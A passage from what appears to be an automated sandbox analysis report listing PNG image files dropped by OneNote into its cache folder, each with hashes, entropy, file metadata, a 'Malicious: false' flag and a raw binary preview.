Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
